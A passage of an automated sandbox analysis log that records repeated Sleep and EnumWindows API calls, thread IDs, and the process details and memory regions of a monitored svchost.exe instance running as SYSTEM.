[0292.223] Sleep (dwMilliseconds=0x64) [0292.287] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0292.290] Sleep (dwMilliseconds=0x64) [0292.352] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0292.353] Sleep (dwMilliseconds=0x64) [0292.373] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0292.374] Sleep (dwMilliseconds=0x64) [0292.414] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0292.415] Sleep (dwMilliseconds=0x64) [0292.434] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0292.435] Sleep (dwMilliseconds=0x64) [0292.467] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0292.468] Sleep (dwMilliseconds=0x64) [0292.507] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0292.508] Sleep (dwMilliseconds=0x64) [0292.584] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0292.588] Sleep (dwMilliseconds=0x64) [0292.634] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0292.637] Sleep (dwMilliseconds=0x64) [0292.726] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0292.727] Sleep (dwMilliseconds=0x64) [0292.780] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0292.781] Sleep (dwMilliseconds=0x64) [0292.957] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0292.958] Sleep (dwMilliseconds=0x64) [0293.017] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0293.018] Sleep (dwMilliseconds=0x64) [0293.044] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0293.045] Sleep (dwMilliseconds=0x64) [0293.140] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0293.140] Sleep (dwMilliseconds=0x64) [0293.169] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0293.170] Sleep (dwMilliseconds=0x64) [0293.187] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0293.187] Sleep (dwMilliseconds=0x64) [0293.232] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0293.233] Sleep (dwMilliseconds=0x64) [0293.281] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0293.281] Sleep (dwMilliseconds=0x64) [0293.326] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0293.326] Sleep (dwMilliseconds=0x64) [0293.373] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0293.373] Sleep (dwMilliseconds=0x64) [0293.426] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0293.427] Sleep (dwMilliseconds=0x64) [0293.475] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0293.479] Sleep (dwMilliseconds=0x64) [0293.528] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0293.529] Sleep (dwMilliseconds=0x64) [0293.628] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0293.629] Sleep (dwMilliseconds=0x64) [0293.682] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0293.683] Sleep (dwMilliseconds=0x64) [0293.794] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0293.795] Sleep (dwMilliseconds=0x64) [0293.825] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0293.826] Sleep (dwMilliseconds=0x64) [0293.883] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0293.884] Sleep (dwMilliseconds=0x64) [0293.952] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0293.953] Sleep (dwMilliseconds=0x64) [0293.993] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0293.994] Sleep (dwMilliseconds=0x64) [0294.042] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0294.042] Sleep (dwMilliseconds=0x64) [0294.089] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0294.090] Sleep (dwMilliseconds=0x64) [0294.143] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0294.144] Sleep (dwMilliseconds=0x64) [0294.186] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0294.186] Sleep (dwMilliseconds=0x64) [0294.206] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0294.206] Sleep (dwMilliseconds=0x64) [0294.214] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0294.214] Sleep (dwMilliseconds=0x64) [0294.247] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0294.247] Sleep (dwMilliseconds=0x64) [0294.285] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0294.286] Sleep (dwMilliseconds=0x64) [0294.356] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0294.357] Sleep (dwMilliseconds=0x64) [0294.392] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0294.393] Sleep (dwMilliseconds=0x64) [0294.502] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0294.503] Sleep (dwMilliseconds=0x64) [0294.603] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0294.604] Sleep (dwMilliseconds=0x64) [0294.636] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0294.637] Sleep (dwMilliseconds=0x64) [0294.688] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0294.689] Sleep (dwMilliseconds=0x64) [0294.749] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0294.749] Sleep (dwMilliseconds=0x64) [0294.812] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0294.813] Sleep (dwMilliseconds=0x64) [0294.935] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0294.936] Sleep (dwMilliseconds=0x64) [0295.030] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0295.031] Sleep (dwMilliseconds=0x64) [0295.124] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0295.124] Sleep (dwMilliseconds=0x64) [0295.326] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0295.327] Sleep (dwMilliseconds=0x64) [0295.441] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0295.441] Sleep (dwMilliseconds=0x64) [0295.626] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0295.627] Sleep (dwMilliseconds=0x64) [0295.746] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0295.746] Sleep (dwMilliseconds=0x64) [0295.884] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0295.886] Sleep (dwMilliseconds=0x64) [0296.058] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0296.059] Sleep (dwMilliseconds=0x64) [0296.137] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0296.138] Sleep (dwMilliseconds=0x64) [0296.231] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0296.231] Sleep (dwMilliseconds=0x64) [0296.324] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0296.326] Sleep (dwMilliseconds=0x64) [0296.497] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0296.583] Sleep (dwMilliseconds=0x64) [0296.637] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0296.637] Sleep (dwMilliseconds=0x64) [0296.732] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0296.732] Sleep (dwMilliseconds=0x64) [0296.785] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0296.786] Sleep (dwMilliseconds=0x64) [0296.795] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0296.795] Sleep (dwMilliseconds=0x64) [0296.856] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0296.856] Sleep (dwMilliseconds=0x64) [0296.905] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0296.906] Sleep (dwMilliseconds=0x64) [0297.035] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0297.036] Sleep (dwMilliseconds=0x64) [0297.137] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0297.138] Sleep (dwMilliseconds=0x64) [0297.316] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0297.317] Sleep (dwMilliseconds=0x64) [0297.478] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0297.487] Sleep (dwMilliseconds=0x64) [0297.586] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0297.587] Sleep (dwMilliseconds=0x64) [0297.744] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0297.745] Sleep (dwMilliseconds=0x64) [0297.893] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0297.893] Sleep (dwMilliseconds=0x64) [0298.024] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0298.025] Sleep (dwMilliseconds=0x64) [0298.214] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0298.250] Sleep (dwMilliseconds=0x64) [0298.407] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0298.408] Sleep (dwMilliseconds=0x64) [0298.511] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0298.512] Sleep (dwMilliseconds=0x64) [0298.609] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0298.610] Sleep (dwMilliseconds=0x64) [0298.683] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0298.684] Sleep (dwMilliseconds=0x64) [0298.702] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0298.703] Sleep (dwMilliseconds=0x64) [0298.718] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0298.718] Sleep (dwMilliseconds=0x64) [0298.789] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0298.789] Sleep (dwMilliseconds=0x64) [0298.886] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0298.887] Sleep (dwMilliseconds=0x64) [0298.952] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0298.952] Sleep (dwMilliseconds=0x64) [0299.045] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0299.046] Sleep (dwMilliseconds=0x64) [0299.127] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0299.127] Sleep (dwMilliseconds=0x64) [0299.167] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0299.168] Sleep (dwMilliseconds=0x64) [0299.235] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0299.235] Sleep (dwMilliseconds=0x64) [0299.279] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0299.279] Sleep (dwMilliseconds=0x64) [0299.344] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0299.344] Sleep (dwMilliseconds=0x64) [0299.450] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0299.451] Sleep (dwMilliseconds=0x64) [0299.506] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0299.509] Sleep (dwMilliseconds=0x64) [0299.558] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0299.562] Sleep (dwMilliseconds=0x64) [0299.671] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0299.672] Sleep (dwMilliseconds=0x64) [0299.764] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0299.765] Sleep (dwMilliseconds=0x64) [0299.935] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0299.935] Sleep (dwMilliseconds=0x64) [0300.050] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0300.051] Sleep (dwMilliseconds=0x64) [0300.136] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0300.136] Sleep (dwMilliseconds=0x64) [0300.222] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0300.223] Sleep (dwMilliseconds=0x64) [0300.345] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0300.346] Sleep (dwMilliseconds=0x64) [0300.374] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0300.375] Sleep (dwMilliseconds=0x64) [0300.422] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0300.423] Sleep (dwMilliseconds=0x64) [0300.449] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0300.450] Sleep (dwMilliseconds=0x64) [0300.515] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0300.515] Sleep (dwMilliseconds=0x64) [0300.560] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0300.561] Sleep (dwMilliseconds=0x64) [0300.639] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0300.640] Sleep (dwMilliseconds=0x64) [0300.695] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0300.696] Sleep (dwMilliseconds=0x64) [0300.739] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0300.739] Sleep (dwMilliseconds=0x64) [0300.815] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0300.816] Sleep (dwMilliseconds=0x64) [0300.880] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0300.880] Sleep (dwMilliseconds=0x64) [0300.915] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0300.916] Sleep (dwMilliseconds=0x64) [0300.957] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0300.957] Sleep (dwMilliseconds=0x64) [0300.966] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0300.967] Sleep (dwMilliseconds=0x64) [0301.027] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0301.028] Sleep (dwMilliseconds=0x64) [0301.107] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0301.108] Sleep (dwMilliseconds=0x64) [0301.247] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0301.248] Sleep (dwMilliseconds=0x64) [0301.297] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0301.298] Sleep (dwMilliseconds=0x64) [0301.348] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0301.349] Sleep (dwMilliseconds=0x64) [0301.420] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0301.421] Sleep (dwMilliseconds=0x64) [0301.466] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0301.467] Sleep (dwMilliseconds=0x64) [0301.533] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0301.534] Sleep (dwMilliseconds=0x64) [0301.585] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0301.585] Sleep (dwMilliseconds=0x64) [0301.628] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0301.629] Sleep (dwMilliseconds=0x64) [0301.697] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0301.698] Sleep (dwMilliseconds=0x64) [0301.759] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0301.760] Sleep (dwMilliseconds=0x64) [0301.854] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0301.854] Sleep (dwMilliseconds=0x64) [0302.852] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0302.853] Sleep (dwMilliseconds=0x64) [0302.919] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0302.919] Sleep (dwMilliseconds=0x64) [0302.966] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0302.967] Sleep (dwMilliseconds=0x64) [0303.153] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0303.154] Sleep (dwMilliseconds=0x64) [0303.264] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0303.266] Sleep (dwMilliseconds=0x64) [0303.813] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0303.814] Sleep (dwMilliseconds=0x64) [0303.933] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0303.933] Sleep (dwMilliseconds=0x64) [0303.989] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0303.990] Sleep (dwMilliseconds=0x64) [0304.051] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0304.052] Sleep (dwMilliseconds=0x64) [0304.208] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0304.209] Sleep (dwMilliseconds=0x64) [0304.323] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0304.324] Sleep (dwMilliseconds=0x64) [0304.418] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0304.419] Sleep (dwMilliseconds=0x64) [0304.514] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0304.515] Sleep (dwMilliseconds=0x64) [0304.582] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0304.582] Sleep (dwMilliseconds=0x64) [0304.653] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0304.654] Sleep (dwMilliseconds=0x64) [0304.694] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0304.699] Sleep (dwMilliseconds=0x64) [0304.902] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0304.903] Sleep (dwMilliseconds=0x64) [0304.952] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0304.952] Sleep (dwMilliseconds=0x64) [0305.040] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0305.041] Sleep (dwMilliseconds=0x64) [0305.188] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0305.189] Sleep (dwMilliseconds=0x64) [0305.374] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0305.374] Sleep (dwMilliseconds=0x64) Thread: id = 182 os_tid = 0xc90 Thread: id = 184 os_tid = 0xc30 Thread: id = 185 os_tid = 0xc2c Thread: id = 186 os_tid = 0xc28 Thread: id = 187 os_tid = 0xc20 Thread: id = 188 os_tid = 0xc24 Thread: id = 189 os_tid = 0xc1c Process: id = "4" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x75956000" os_pid = "0x360" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "created_scheduled_job" parent_id = "3" os_parent_pid = "0x214" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000abff" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 1588 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1589 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 1590 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1591 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1592 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1593 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1594 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1595 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1596 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1597 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1598 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1599 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1600 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1601 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1602 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1603 start_va = 0x420000 end_va = 0x421fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dosvc.dll.mui" filename = "\\Windows\\System32\\en-US\\dosvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dosvc.dll.mui") Region: id = 1604 start_va = 0x450000 end_va = 0x454fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 1605 start_va = 0x460000 end_va = 0x46ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 1606 start_va = 0x470000 end_va = 0x472fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui") Region: id = 1607 start_va = 0x480000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 1608 start_va = 0x540000 end_va = 0x546fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1609 start_va = 0x550000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1610 start_va = 0x5d0000 end_va = 0x5d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 1611 start_va = 0x5e0000 end_va = 0x5e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 1612 start_va = 0x5f0000 end_va = 0x5f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 1613 start_va = 0x600000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 1614 start_va = 0x700000 end_va = 0x887fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 1615 start_va = 0x890000 end_va = 0x890fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 1616 start_va = 0x8a0000 end_va = 0x8a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 1617 start_va = 0x8b0000 end_va = 0x8bcfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "gpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui") Region: id = 1618 start_va = 0x8c0000 end_va = 0x8c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 1619 start_va = 0x8e0000 end_va = 0x8e3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1620 start_va = 0x8f0000 end_va = 0x8f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Region: id = 1621 start_va = 0x900000 end_va = 0x9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 1622 start_va = 0xa00000 end_va = 0xb80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a00000" filename = "" Region: id = 1623 start_va = 0xb90000 end_va = 0xc8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b90000" filename = "" Region: id = 1624 start_va = 0xc90000 end_va = 0xc93fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1625 start_va = 0xca0000 end_va = 0xcb0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 1626 start_va = 0xcc0000 end_va = 0xcc6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cc0000" filename = "" Region: id = 1627 start_va = 0xcd0000 end_va = 0xd14fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db") Region: id = 1628 start_va = 0xd20000 end_va = 0xd2cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 1629 start_va = 0xd30000 end_va = 0xd36fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d30000" filename = "" Region: id = 1630 start_va = 0xdc0000 